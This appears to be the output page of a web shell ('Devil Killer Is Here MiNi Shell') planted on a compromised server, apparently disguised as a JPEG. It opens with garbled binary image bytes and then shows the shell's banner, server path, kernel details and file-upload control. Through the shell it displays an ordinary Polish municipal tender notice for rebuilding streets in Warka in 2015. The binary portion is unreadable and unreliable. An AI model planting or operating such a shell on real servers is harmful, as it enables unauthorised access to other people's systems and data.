JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150302/45560-N-2015.html

<p class="kh_header"><b>Warka: Przebudowa ulicy Długiej oraz odcinków ulic Cmentarnej i Wysockiego w Warce</b><br>
<b>Numer ogłoszenia: 45560 - 2015; data zamieszczenia: 02.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warka , Plac St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, tel. 048 665 12 00, faks 048 665 12 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Długiej oraz odcinków ulic Cmentarnej i Wysockiego w Warce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest przebudowa ulicy Długiej oraz odcinków ulic Cmentarnej i Wysockiego w Warce. 
- ul. Długa
Ulica Długa rozciąga się od ul. Warszawskiej do ul. Cmentarnej. W bezpośrednim sąsiedztwie ulicy znajduje się  Plac I-go Pułku Lotnictwa Myśliwskiego oraz park miejski. 
W początkowym odcinku ulicy oraz w jej bezpośrednim sąsiedztwie dokonano szeregu inwestycji drogowych doprowadzając nawierzchnie ulic do stanu wysokiej funkcjonalności i estetyki.
Kompleksowo przebudowano także Plac I-go Pułku Lotnictwa Myśliwskiego, na którym zlokalizowany jest parking. 
Przebudowa dalszego odcinka ulicy Długiej  do jej końca, z wyłączeniem  skrzyżowania z ul. Mostową ma być kontynuacją poprawy bezpieczeństwa, funkcjonalności i estetyki ulicy.
Ulica Długa  pomimo lokalnego charakteru pełni istotne funkcje w układzie komunikacyjnym Warki. Ulica ta znajduje się w ścisłym centrum miasta i stanowi jeden z głównych ciągów drogowych łączący się z układem ulic zbiorczych i głównych.
Na ulicy Długiej zlokalizowana jest znaczna ilość punktów usługowych (sklepy, zakłady usługowe itp.). W granicy pasa usytuowana jest zwarta zabudowa usługowo-mieszkalna do 3 kondygnacji, z usługami na parterze. Dojazd do zaplecza niektórych budynków odbywa się poprzez istniejące bramy zlokalizowane przy ul. Długiej. 
W pasie drogowym występuje bogate uzbrojenie podziemne: wodociąg, gazociąg, kanał sanitarny, linie telekomunikacyjne, odcinkami linie energetyczne.
Istniejąca ulica Długa  posiada nawierzchnię bitumiczną. Posiada ona liczne spękania i odkształcenia krawędziowe.. 
Ruch drogowy o charakterze lokalnym związany jest z dojazdem do licznych punktów usługowych zlokalizowanych bezpośrednio przy ulicy Długiej jak również zlokalizowanych w sąsiednich ulicach. 
Przy ulicy znajduje się baza autobusowa PKS,  market budowlany, oraz dwa przystanki autobusowe. Ulica zlokalizowana jest w bezpośrednim sąsiedztwie tzw. Parku Saskiego stanowiącego teren zieleni miejskiej.
Przebudowa ulicy Długiej  (droga gminna nr 161093W): 
Przebudowa w ramach niniejszego postępowania podzielona została na dwa odcinki tj.: odcinek od km 0+000 do km 0+223,80(do ul. Mostowej) oraz odcinek od km 0+230 do km 0+506,67 (ul. Mostowa - ul. Cmentarna).
I. Przebudowa na  odcinku od km 0+000 do km 0+223,08 (ul. Mostowa) w ramach niniejszego zadania obejmuje:
1. Remont jezdni w istniejącej geometrii ulicy szer.6,7-9,7 m wraz z obustronnymi  chodnikami oraz zjazdami, wraz z wymianą konstrukcji.
2. Zachowanie istniejącej organizacji ruchu oraz równoległego parkowania po stronie południowej ulicy
3. Zachowanie lokalizacji istniejącego przystanku autobusowego  
4. Włączenie do przebudowanej w ramach NPPDL w 2011 r. ul. Mostowej
5. Budowę odwodnienia ulicy poprzez budowę kanalizację deszczową wraz z wpustami ulicznymi.
6. Oznakowanie pionowe i poziome, 

II. Przebudowa na odcinku od km 0+230 do km 0+506,67 (ul. Mostowa - ul. Cmentarna) w ramach niniejszego zadania obejmuje:
1. Przebudowę  jezdni o szer.6-7 m wraz z obustronnymi  chodnikami, zjazdami oraz budową ciągu pieszo-rowerowego, wraz z wymianą konstrukcji .
2. Budowę miejsc postojowych 
3. Zachowanie lokalizacji istniejącego przystanku autobusowego  
4. Włączenie do przebudowanej w ramach NPPDL w 2011 r. ul. Mostowej
5. Budowa odwodnienia ulicy poprzez budowę kanalizacji deszczowej wraz z wpustami ulicznymi.
6. Oznakowanie pionowe i poziome, w tym ustawienie fizycznych barier uniemożliwiających parkowanie poza wydzielonymi miejscami postojowymi w postaci słupków blokujących
7. Usunięcie starych drzew 
8. Zagospodarowanie zielenią.
 

Wykonawca zobowiązany będzie do opracowania, wprowadzenia i utrzymania czasowej organizacji ruchu na czas budowy. Z uwagi na lokalizacje zakładów usługowych przy ul. Długiej  niezbędne będzie zachowanie dojścia do w/w lokali w czasie budowy. Ponadto z ulicy Długiej istnieje bezpośredni zjazd do bazy PKS. Wykonawca zobowiązany będzie również uwzględnić w projekcie czasowej organizacji ruchu kursującą komunikację autobusową na ul. Długiej oraz 2 przystanki autobusowe. Zmiany lokalizacji przystanków, wraz z ewentualną alternatywną trasą autobusów należy uzgodnić z PKS Sp. z o.o. w Grójcu oraz PKS Sp. z o.o. w Kozienicach.
 Jednocześnie informujemy, iż Gmina Warka, w 2011 r.  dokonała kompleksowej przebudowy ul. Mostowej. W związku z powyższym przy wykonywaniu prac związanych z ulicą Długą,  niedopuszczalne będzie wykonywanie remontów cząstkowych na ulicy Mostowej. W przypadku uszkodzenia asfaltu, niezbędne będzie wykonanie całego skrzyżowania.

- ul. Cmentarna 
Ulica Cmentarna  posiada w wierzchniej warstwie nawierzchnię bitumiczną. 
Na ulicy Cmentarnej występuje zabudowa jednorodzinna. Jest to droga prowadząca do Cmentarza. Po przeznaczonym do przebudowy odcinku poruszają się kondukty pogrzebowe  z Kościoła do cmentarza. Ponadto  przy w/w ulicy znajduje się  market Mrówka, jak również odbywa  się  komunikacja autobusowa.
 W pasie drogowym występuje bogate uzbrojenie podziemne: wodociąg, gazociąg, kanał sanitarny, linie telekomunikacyjne, odcinkami linie energetyczne.
Przebudowa ulicy Cmentarnej obejmuje odcinek od 0+000 do km 0+155,30  (droga gminna nr 161034W) w Warce.

Przebudowa ulicy Cmentarnej w ramach niniejszego zadania obejmuje: 
1. Przebudowę jezdni, chodników, zjazdów, wraz z wymianą konstrukcji.
2. Budowę odwodnienia ulicy poprzez budowę kanalizacji deszczowej wraz z wpustami ulicznymi.
3. Oznakowanie pionowe i poziome, 
W 2013 r. , w ramach NPPDL, Gmina Warka dokonała  przebudowy odcinka 
ul. Cmentarnej (36 m). Wykonawca zobowiązany będzie do włączenia wykonywanej przebudowy w przebudowany odcinek ul. Cmentarnej, bez pogorszenia jego walorów funkcjonalnych i estetycznych. W przypadku uszkodzenia nawierzchni chodników, ścieżki rowerowej, krawężników itp., Wykonawca zobowiązany będzie do naprawy, włącznie z wymianą materiałów (kostka, krawężniki itp.) na nowe.   
Wykonawca zobowiązany będzie do opracowania, wprowadzenia i utrzymania odpowiedniej czasowej organizacji ruchu na czas budowy, zapewniającą dojścia do posesji oraz uwzględniając  kursującą komunikację autobusową.


- ul. Wysockiego 
Przebudowa ulicy Wysockiego  obejmuje odcinek od skrzyżowania z ulicą Cmentarną  do skrzyżowania ul. Wysockiego i Mostowej, przebudowanych w ramach NPPDL, w 2011 r. Dodatkowo na końcu przebudowywanego odcinka znajduje się przebudowany w 2014 roku łącznik pieszo rowerowy pomiędzy ulicą Wysockiego a ul. Polną.

Ulica Wysockiego posiada w wierzchniej warstwie nawierzchnię bitumiczną.  Występują miejscowo łaty remontów cząstkowych oraz napraw nawierzchni po przekopach, w nawierzchni występują miejscowo spękania oraz wyraźne ślady po rozbiórce i odtworzeniu. 
Przy ul. Wysockiego znajduje się market budowlany- z ulicy tej korzystają zatem samochody ciężarowe dostarczające surowce. Ponadto odbywa się tu ruch autobusów, których baza zlokalizowana jest bezpośrednio przy ulicy. Jednocześnie przy ulicy znajduje się zabudowa jedno i wielorodzinna oraz przedszkole. W chodniku znajdują się drzewa w złym stanie - przewidziane do wycinki.
Przebudowa ulicy Wysockiego - odcinek od 0+000 do km 0+254,21  (droga gminna 161054W) w ramach niniejszego zadania obejmuje: 
 1. Przebudowę  jezdni wraz z obustronnymi  chodnikami, zjazdami, wraz z wymianą konstrukcji .
2. Budowę miejsc postojowych 
3. Włączenie do przebudowanej w ramach NPPDL w 2011 r. ul. Mostowej i Wysockiego
4. Budowę odwodnienia ulicy poprzez budowę kanalizacji deszczowej wraz z wpustami ulicznymi.
5. Oznakowanie pionowe i poziome, w tym montaż pary progów  zwalniających.
6. Usunięcie starych drzew
7. Zagospodarowanie zielenią.

W 2011 r. , w ramach NPPDL, Gmina Warka dokonała  przebudowy odcinka ul. Mostowej oraz dalszego odcinka ul. Wysockiego. Wykonawca zobowiązany będzie do włączenia wykonywanej przebudowy w przebudowane skrzyżowanie Wysockiego-Mostowa, bez pogorszenia jego walorów funkcjonalnych i estetycznych. W przypadku uszkodzenia nawierzchni jezdni, chodników, ścieżki rowerowej, krawężników itp. , Wykonawca zobowiązany będzie do naprawy, włącznie z wymianą materiałów (kostka, krawężniki itp.) na nowe.   

Przebudowa ulic: Długiej i odcinków ulic Cmentarnej i Wysockiego w Warce , realizowana będzie w oparciu o środki finansowe uzyskane z Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo Dostępność Rozwój. W związku z powyższym niedopuszczalne będzie przesunięcie terminów realizacji umowy, z uwagi na utratę dotacji przez Zamawiającego. Wykonawca przystępując do opracowania oferty powinien mieć świadomość  powyższej sytuacji i odpowiednio wcześnie przystąpić do realizacji wszystkich prac związanych z realizacja umowy ( w tym opracowanie i zatwierdzenie projektu czasowej organizacji ruchu). W przypadku nie wywiązania się Wykonawcy z wymaganych terminów, Zamawiający bezwzględnie będzie  egzekwował zapisy umowy  dotyczące  kar umownych. 

Prace rozbiórkowe należy prowadzić w sposób umożliwiający odzyskanie materiałów tj.: destrukt, kamień polny, kostka brukowa, płyty betonowe itp.  Wykonawca zobowiązany jest przekazać powyższe Zamawiającemu, w miejsce przez niego wskazane. Powyższe Wykonawca powinien  uwzględnić w ofercie. 
Gmina Warka informuje, że równolegle z niniejszym postępowaniem, prowadzi postępowanie  przetargowe na rewitalizację miejskiego parku, położonego bezpośrednio przy ul. Długiej. 
Wykonawca przystępując do niniejszego postępowania przetargowego musi mieć świadomość konieczności współpracy z Wykonawcą robót budowy rewitalizacji parku.
Niniejszą przebudowę należy wykonać zgodnie z załączoną dokumentacją projektową.
Na przedmiotowym  terenie występuje zwarta zabudowa mieszkaniowa oraz obiekty użyteczności publicznej. Wykonawca realizując zadanie musi mieć świadomość utrudnień z tym związanych. Należy zapewnić bezpieczny dostęp do obiektów tj.: punkty usługowo - handlowe, baza PKS itp., jak również należy uwzględnić obecność 2 przystanków autobusowych na ul. Długiej. Ulica Długa łączy się z ulicą Warszawską będącą drogą wojewódzką  -  zaproponować odpowiednią czasową organizację ruchu.
Wykonawca zobowiązany jest do wykonania całości opracowania projektowego bez względu na podane jednostki obmiarowe.   
Szczegółowy opis przedmiotu zamówienia zawarty jest  się w dokumentacji technicznej stanowiącej załącznik Nr 9 do Specyfikacji Istotnych Warunków Zamówienia.                                                  
Roboty winny zostać wykonane i ukończone zgodnie z prawem obowiązującym w Rzeczypospolitej Polskiej, w szczególności: Prawem Budowlanym, Prawem ochrony środowiska, Prawem o ruchu drogowym oraz ustawą o drogach publicznych, ustawą o odpadach, ustawą o badaniach i certyfikacji i wymaganiami Zamawiającego, a kierowanie i nadzorowanie robót mogą wykonywać osoby, które posiadają wymagane prawem uprawnienia i są ubezpieczone od odpowiedzialności cywilnej. 
Przedmiot zamówienia należy zrealizować według   dokumentacji technicznej.  
Integralną częścią specyfikacji jest projekt techniczny, który określa parametry techniczne , jakościowe -z odwołaniem się do aprobat i atestów, standardu oraz sposobu wykonania urządzeń technologicznych. Podane informacje należy uwzględnić na etapie przygotowywania oferty.
Zamawiający ustala ryczałtowy system wynagradzania. Oferent powinien przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę oferty, w tym ewentualne kolizje z infrastrukturą podziemną, które Wykonawca zobowiązany będzie usunąć w ramach ceny ryczałtowej. Podstawę do określenia całkowitej ryczałtowej ceny stanowi zakres robót budowlanych określony w dokumentacji projektowej i przedmiarach oraz zakres prac określony w SIWZ, realizowanych zgodnie ze sztuką budowlaną i przepisami ustawy Prawo budowlane oraz Specyfikacji Technicznych Wykonania i Odbioru Robót.
Wykonawca winien sporządzić kosztorys ofertowy na podstawie dostarczonego przedmiaru robót. Przedmiar ma charakter informacyjno-pomocniczy. Załączony przez oferenta kosztorys ofertowy ze względu na ryczałtowy sposób wynagradzania , będzie miał również charakter informacyjno-pomocniczy. Wyłonionego Wykonawcę obowiązuje wykonanie przedmiotu zamówienia zgodnie z dokumentacją projektową, SIWZ oraz STWiOR. Zamawiający nie będzie badał zgodności podstawy wyceny, ani ilości robót w złożonych przez oferentów kosztorysach ofertowych. Załączone kosztorysy mają charakter informacyjno pomocniczy.
Cena określona w ofercie musi zawierać wszystkie koszty związane z realizacją zamówienia wynikające z dokumentacji, SIWZ, STWiOR, jak również nie ujęte w dokumentacji projektowej , a niezbędne do wykonania zadania.  
Dopuszcza się zastosowanie urządzeń/rozwiązań równoważnych w stosunku do urządzeń/rozwiązań  projektowych.  W wypadku złożenia oferty na urządzenia/rozwiązania  równoważne parametry techniczne, funkcjonalne i użytkowe oferowanych urządzeń/rozwiązań równoważnych muszą być co najmniej takie same, jak parametry urządzeń/rozwiązań projektowych.
Wszelkie odstępstwa od dokumentacji projektowej muszą być udokumentowane załączonymi do oferty obliczeniami, szczegółowymi rysunkami technicznymi, kartami katalogowymi urządzeń zamiennych. Niniejsze dokumenty muszą w sposób jednoznaczny  stwierdzać równoważność proponowanych urządzeń w stosunku do przyjętych w projekcie oraz muszą być załączone do oferty. 
Powyższe zmiany muszą być wykazane w załączniku Nr 6  i dołączone  do oferty.
Zamawiający zastrzega sobie prawo do korzystania z opinii ekspertów w celu dokonania  oceny równoważności proponowanych rozwiązań.
Oferta Wykonawcy, w której zostanie  stwierdzone , iż zaproponowane rozwiązania nie są równoważne zostanie odrzucona zgodnie z art. 89 ust. 1, pkt 2.
Po zakończeniu zadania Wykonawca sporządzi własnym staraniem i na własny koszt wykaz zrealizowanych prac (rozliczenie rzeczowe - m2, mb, szt.),  w tym wykaz długości wybudowanych sieci dla poszczególnych rodzajów materiałów średnic, i ulic.  Powyższe materiały dołączy do dokumentów odbiorowych. Wykaz winien być podpisany przez uprawnionego geodetę, kierownika budowy i inspektora nadzoru inwestorskiego.
Ponadto do zadań Wykonawcy należało będzie  zebranie danych wraz z dokumentacją fotograficzną i filmową i wprowadzenie ich do książki drogi odpowiednio dla poszczególnych ulic. Książki drogi Gmina prowadzi w wersji elektronicznej, w programie EDIOM DESIGNERS . Zebranie i wprowadzenie danych po odbiorze i wprowadzeniu stałej organizacji ruchu.
W celu umożliwienia Wykonawcy fakturowania częściowego, opracuje on harmonogram rzeczowo- terminowo- finansowy, obejmujący wszystkie pozycje kosztorysu ofertowego.
Szczegółowy opis obowiązków Wykonawcy zawarty jest we wzorze umowy.


Dane teleadresowe:
1. Mazowiecki Zarząd Dróg Wojewódzkich w Warszawie,
    Rejon Drogowy Otwock - Piaseczno, ul. Górna 18, 05-400 Otwock, tel. (022) 779 24 87, 
    (022) 779 30 20
    Obwód Drogowy w Warce, ul. Grójecka 28, 05-660 Warka, tel.: (48) 667-21-54
2. PGE Dystrybucja S.A. Oddział Skarżysko Kamienna
     Rejon Energetyczny Kozienice, ul. Przemysłowa 11, tel. (048) 667 04 01
     Posterunek Warka tel.: (048) 667 04 01
3. Polska Spółka Gazownictwa Sp. z o.o.
    Oddział w Warszawie, Zakład w Radomiu, ul. Gazowa 11/13, tel. (048) 332 41 84
    Rejon Dystrybucji Gazu w Mogielnicy, ul. Stegny, tel.: (048) 663 51 42
4. Starostwo Powiatowe w Grójcu
     Wydział Komunikacji i Transportu,  ul. Piłsudskiego 59, tel.: (048) 665 11 29
5. Komenda Powiatowa Policji w Grójcu, ul. Brzozowa 108, 05-600 Grójec, 
    tel.: (048) 668 72 00
   
  
Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa - załącznik nr 8  do SIWZ oraz specyfikacje techniczne wykonania i odbioru robót budowlanych - załącznik nr 9  do SIWZ.  

Szczegółowy opis przedmiotu zamówienia zawarty jest w SIWZ na stronie internetowej www.warka.pl/zp.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt. 6 ustawy Pzp do 50% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.23.30.00-9, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 20 000,00 zł. 
Wadium będzie uznane za wniesione, jeżeli przed terminem otwarcia ofert (dniem i godziną) będzie się znajdować: w pieniądzu - na koncie Zamawiającego; w innej formie niż pieniądz (dopuszczonej przez Zamawiającego) - znajdzie się w kasie Urzędu Miejskiego w Warce 
pl. Stefana Czarnieckiego 1. 
Szczegółowe wymagania dotyczące wadium określone są w SIWZ w pkt 8</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w w/w zakresie nie precyzuje warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie doświadczenia zawodowego w zakresie robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
Wykonawca przedstawi dokumenty świadczące o tym, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie budowy lub przebudowy lub remonty ulic w terenie miejskim których wartość wynosiła co najmniej 1 000 000,00 zł każda.

Ocena spełniania tego warunku zostanie dokonana na podstawie złożonych dokumentów wymaganych i określonych w p. punkcie III.4.1  - wg kryterium: spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w w/w zakresie nie precyzuje warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami odpowiedzialnymi za wykonanie zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających uprawnienia budowlane, upoważniające w świetle obowiązujących przepisów do kierowania i nadzorowania robót w zakresie zamówienia. 

           Wymagane osoby to: 

a)	Kierownik Budowy - posiadający następujące kwalifikacje:
- co najmniej 3 lata doświadczenia zawodowego (liczone od dnia uzyskania uprawnień bez ograniczeń) na stanowisku Kierownika Budowy lub Kierownika Robót z zakresu budowy dróg oraz robót ziemnych, 
- uprawnienia budowlane bez ograniczeń do kierowania budową i robotami budowlanymi w branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę,
- wykształcenie wyższe.

b)	Kierownik Robót Instalacji Sanitarnych- posiadający następujące kwalifikacje:
- co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Instalacji Sanitarnych lub kierownika budowy, liczone od dnia uzyskania uprawnień.
- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę,
- wykształcenie wyższe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w w/w zakresie nie precyzuje warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca przedstawi dokumenty świadczące o tym, że wykonał minimum dwie budowy lub przebudowy lub remonty ulic w terenie miejskim, których wartość wynosiła co najmniej 1 000 000,00 zł brutto każda;</li>

